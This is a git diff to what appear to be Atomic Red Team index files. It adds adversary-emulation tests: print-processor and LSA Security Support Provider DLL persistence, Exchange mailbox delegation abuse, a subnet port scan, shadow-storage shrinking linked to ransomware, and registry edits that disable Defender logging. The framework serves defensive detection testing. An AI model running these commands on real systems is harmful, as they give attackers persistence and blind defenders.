+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
elevation_required: true
T1181:
@@ -56794,7 +56864,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -56834,7 +56904,43 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- atomic_tests: []
+ identifier: T1547.012
+ atomic_tests:
+ - name: Print Processors
+ auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+ description: |
+ Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+ The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+ Note: The test assumes a x64 Windows operating system.
+
+ The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+ supported_platforms:
+ - windows
+ input_arguments:
+ restart:
+ description: set to 1 if you want the computer to reboot as part of the
+ test
+ type: integer
+ default: 0
+ executor:
+ command: |
+ if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+ net stop spooler
+ Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+ reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+ net start spooler
+ if(#{restart}){
+ Restart-Computer
+ }
+ cleanup_command: |
+ net stop spooler
+ rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+ rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+ remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+ net start spooler
+ name: powershell
+ elevation_required: true
T1574.001:
technique:
modified: '2023-03-30T21:01:51.098Z'
@@ -59061,28 +59167,43 @@ persistence:
- Administrator
identifier: T1547.005
atomic_tests:
- - name: Modify SSP configuration in registry
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+ configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+ description: |
+ Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+ A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
+ name: powershell
+ elevation_required: true
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
+ Provider configuration in registry
+ auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial
modification of those keys.
supported_platforms:
- windows
- input_arguments:
- fake_ssp_dll:
- description: Value added to registry key. Normally refers to a DLL name
- in C:\Windows\System32.
- type: string
- default: not-a-ssp
executor:
command: |
- # run these in sequence
- $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
- $SecurityPackagesUpdated = $SecurityPackages
- $SecurityPackagesUpdated += "#{fake_ssp_dll}"
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
- # revert (before reboot)
- Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
+ Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
elevation_required: true
T1004:
@@ -70909,7 +71030,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -70930,7 +71051,59 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- atomic_tests: []
+ identifier: T1098.002
+ atomic_tests:
+ - name: EXO - Full access mailbox permission granted to a user
+ auto_generated_guid: 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+ description: |
+ Give a nominated user, full mailbox delegation access of another user.
+ This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
+ supported_platforms:
+ - office-365
+ input_arguments:
+ username:
+ description: office-365 username
+ type: string
+ default: o365_user_test@contoso.com
+ password:
+ description: office-365 password
+ type: string
+ default: o365_password_test
+ delegate_target:
+ description: office-365 target_email
+ type: string
+ default: delegate@contoso.com
+ operator_mailbox:
+ description: office-365 target_email
+ type: string
+ default: operator@contoso.com
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'ExchangeOnlineManagement PowerShell module must be installed
+
+ '
+ prereq_command: |
+ $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+ get_prereq_command: "Install-Module -Name ExchangeOnlineManagement \n"
+ executor:
+ command: |
+ Import-Module ExchangeOnlineManagement
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
+ Disconnect-ExchangeOnline -Confirm:$false
+ cleanup_command: |
+ Import-Module ExchangeOnlineManagement
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
+ Disconnect-ExchangeOnline -Confirm:$false
+ name: powershell
+ elevation_required: false
T1084:
technique:
x_mitre_platforms:
@@ -74128,7 +74301,7 @@ command-and-control:
Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok
executor:
command: "C:\\Users\\Public\\ngrok\\ngrok.exe config add-authtoken #{api_token}
- | Out-Null\nStart-ThreadJob -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe
+ | Out-Null\nStart-Job -ScriptBlock { C:\\Users\\Public\\ngrok\\ngrok.exe
tcp #{port_num} } | Out-Null\nStart-Sleep -s 5 \nStop-Job -Name Job1 | Out-Null\n"
cleanup_command: |
Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore
@@ -77501,7 +77674,7 @@ collection:
dir
- name: Compress Data and lock with password for Exfiltration with 7zip
auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
- description: 'Note: Requires 7zip installation
+ description: 'Note: This test requires 7zip installation
'
supported_platforms:
@@ -102668,6 +102841,57 @@ discovery:
docker stop t1046_container
docker rmi -f t1046
name: sh
+ - name: Port-Scanning /24 Subnet with PowerShell
+ auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4
+ description: |
+ Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
+ The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
+ supported_platforms:
+ - windows
+ input_arguments:
+ ip_address:
+ description: IP-Address within the target subnet. Default is empty and script
+ tries to determine local IP address of attacking machine.
+ type: string
+ default: ''
+ port_list:
+ description: Comma separated list of ports to scan
+ type: string
+ default: 445, 3389
+ timeout_ms:
+ description: Connection timeout in milliseconds
+ type: string
+ default: '200'
+ executor:
+ command: |
+ $ipAddr = "#{ip_address}"
+ if ($ipAddr -eq "") {
+ # Assumes the "primary" interface is shown at the top
+ $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+ Write-Host "[i] Using Interface $interface"
+ $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+ }
+ Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+ $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+ # Always assumes /24 subnet
+ Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+ $ports = #{port_list}
+ $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+ foreach ($ip in $subnetIPs) {
+ foreach ($port in $ports) {
+ try {
+ $tcp = New-Object Net.Sockets.TcpClient
+ $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+ } catch {}
+ if ($tcp.Connected) {
+ $tcp.Close()
+ Write-Host "Port $port is open on $ip"
+ }
+ }
+ }
+ name: powershell
T1518:
technique:
modified: '2023-03-30T21:01:50.920Z'
@@ -110871,6 +111095,18 @@ impact:
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
name: command_prompt
elevation_required: true
+ - name: Windows - vssadmin Resize Shadowstorage Volume
+ auto_generated_guid: da558b07-69ae-41b9-b9d4-4d98154a7049
+ description: Adversaries generally try to Resize Shadowstorage Volume using
+ vssadmin.exe to avoid the shadow volumes being made again. This technique
+ is typically found used by adversaries during a ransomware event and a precursor
+ to deleting the shadowstorage.
+ supported_platforms:
+ - windows
+ executor:
+ command: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=20%'
+ name: powershell
+ elevation_required: true
T1561.001:
technique:
modified: '2023-04-12T23:42:59.868Z'
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml
index 324b3d27..a92b8251 100644
--- a/atomics/Indexes/linux-index.yaml
+++ b/atomics/Indexes/linux-index.yaml
@@ -21331,7 +21331,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -21371,6 +21371,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -37421,7 +37422,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -37461,6 +37462,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -47183,7 +47185,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -47204,6 +47206,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml
index fe163812..48871e63 100644
--- a/atomics/Indexes/macos-index.yaml
+++ b/atomics/Indexes/macos-index.yaml
@@ -20537,7 +20537,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -20577,6 +20577,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -35725,7 +35726,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -35765,6 +35766,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -45327,7 +45329,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -45348,6 +45350,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml
index 5892a50f..637b5b18 100644
--- a/atomics/Indexes/office-365-index.yaml
+++ b/atomics/Indexes/office-365-index.yaml
@@ -18378,7 +18378,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18418,6 +18418,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32739,7 +32740,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32779,6 +32780,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -41730,7 +41732,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41751,7 +41753,59 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- atomic_tests: []
+ identifier: T1098.002
+ atomic_tests:
+ - name: EXO - Full access mailbox permission granted to a user
+ auto_generated_guid: 17d046be-fdd0-4cbb-b5c7-55c85d9d0714
+ description: |
+ Give a nominated user, full mailbox delegation access of another user.
+ This can be used by an adversary to maintain persistent access to a target's mailbox in M365.
+ supported_platforms:
+ - office-365
+ input_arguments:
+ username:
+ description: office-365 username
+ type: string
+ default: o365_user_test@contoso.com
+ password:
+ description: office-365 password
+ type: string
+ default: o365_password_test
+ delegate_target:
+ description: office-365 target_email
+ type: string
+ default: delegate@contoso.com
+ operator_mailbox:
+ description: office-365 target_email
+ type: string
+ default: operator@contoso.com
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'ExchangeOnlineManagement PowerShell module must be installed
+
+ '
+ prereq_command: |
+ $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+ get_prereq_command: "Install-Module -Name ExchangeOnlineManagement \n"
+ executor:
+ command: |
+ Import-Module ExchangeOnlineManagement
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ Add-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All
+ Disconnect-ExchangeOnline -Confirm:$false
+ cleanup_command: |
+ Import-Module ExchangeOnlineManagement
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ Remove-MailboxPermission -Identity "#{delegate_target}" -User "#{operator_mailbox}" -AccessRights FullAccess -InheritanceType All -Confirm:$false
+ Disconnect-ExchangeOnline -Confirm:$false
+ name: powershell
+ elevation_required: false
T1084:
technique:
x_mitre_platforms:
diff --git a/atomics/Indexes/saas-index.yaml b/atomics/Indexes/saas-index.yaml
index 7d0c89da..bd015c73 100644
--- a/atomics/Indexes/saas-index.yaml
+++ b/atomics/Indexes/saas-index.yaml
@@ -18248,7 +18248,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -18288,6 +18288,7 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -32609,7 +32610,7 @@ persistence:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -32649,6 +32650,7 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
+ identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
@@ -41600,7 +41602,7 @@ persistence:
D. - Defending O365 - 2019)"
modified: '2022-04-19T14:55:26.110Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Additional Email Delegate Permissions
+ name: 'Account Manipulation: Additional Email Delegate Permissions'
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action
@@ -41621,6 +41623,7 @@ persistence:
- 'Application Log: Application Log Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1098.002
atomic_tests: []
T1084:
technique:
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index 79e926d7..b25173de 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -10603,6 +10603,23 @@ defense-evasion:
'
name: powershell
elevation_required: true
+ - name: Allow Simultaneous Download Registry
+ auto_generated_guid: 37950714-e923-4f92-8c7c-51e4b6fffbf6
+ description: 'A registry modification to allow Simultaneous download in the
+ system.
+
+ '
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
+ reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
+ cleanup_command: |
+ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
+ reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
+ name: command_prompt
+ elevation_required: true
T1574.008:
technique:
modified: '2023-03-30T21:01:44.781Z'
@@ -12760,15 +12777,16 @@ defense-evasion:
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+ https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: 'reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" /v Operational /t REG_DWORD /d 0 /f
+ Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" /v Operational /f >nul 2>&1
+ Defender/Operational" /v Enabled /f >nul 2>&1
'
name: command_prompt
@@ -12778,15 +12796,16 @@ defense-evasion:
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+ https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: 'New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" -Name Operational -PropertyType DWord -Value 0 -Force
+ Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
'
cleanup_command: 'Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows
- Defender" -Name Operational -Force -ErrorAction Ignore
+ Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
'
name: powershell
@@ -29045,7 +29064,7 @@ privilege-escalation:
description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti
Group. Retrieved August 24, 2020.
modified: '2020-10-09T16:05:36.344Z'
- name: Print Processors
+ name: 'Boot or Logon Autostart Execution: Print Processors'
description: "Adversaries may abuse print processors to run malicious DLLs during
system boot for persistence and/or privilege escalation. Print processors
are DLLs that are loaded by the print spooler service, spoolsv.exe, during
@@ -29085,7 +29104,43 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- atomic_tests: []
+ identifier: T1547.012
+ atomic_tests:
+ - name: Print Processors
+ auto_generated_guid: f7d38f47-c61b-47cc-a59d-fc0368f47ed0
+ description: |
+ Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
+ The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
+
+ Note: The test assumes a x64 Windows operating system.
+
+ The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
+ supported_platforms:
+ - windows
+ input_arguments:
+ restart:
+ description: set to 1 if you want the computer to reboot as part of the
+ test
+ type: integer
+ default: 0
+ executor:
+ command: |
+ if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
+ net stop spooler
+ Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+ reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
+ net start spooler
+ if(#{restart}){
+ Restart-Computer
+ }
+ cleanup_command: |
+ net stop spooler
+ rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+ rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+ remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
+ net start spooler
+ name: powershell
+ elevation_required: true
T1574.001:
technique:
modified: '2023-03-30T21:01:51.098Z'
@@ -30561,28 +30616,43 @@ privilege-escalation:
- Administrator
identifier: T1547.005
atomic_tests:
- - name: Modify SSP configuration in registry
+ - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
+ configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
+ description: |
+ Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
+ A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
+ Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
+ $newvalue = "AtomicTest.dll";
+ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
+ cleanup_command: |-
+ $oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
+ Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
